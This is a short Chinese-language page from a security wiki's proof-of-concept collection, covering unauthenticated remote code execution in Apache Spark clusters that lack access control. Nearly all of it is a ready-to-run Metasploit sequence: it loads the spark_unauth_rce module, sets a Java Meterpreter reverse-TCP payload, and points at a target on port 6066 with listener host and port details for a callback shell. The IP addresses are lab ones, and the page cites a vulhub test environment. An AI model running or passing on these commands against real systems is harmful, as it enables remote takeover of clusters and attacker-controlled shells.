menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Apache-Spark chevron_right Apache Spark 未授权访问漏洞
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。

    漏洞利用

    use exploit/linux/http/spark_unauth_rce
    set payload java/meterpreter/reverse_tcp
    set rhost 192.168.226.140
    set rport 6066
    
    set lhost 192.168.226.134
    set lport 4444
    set srvhost 192.168.226.134
    set srvport 8080
    exploit

    参考链接

    https://github.com/vulhub/vulhub/blob/master/spark/unacc/README.md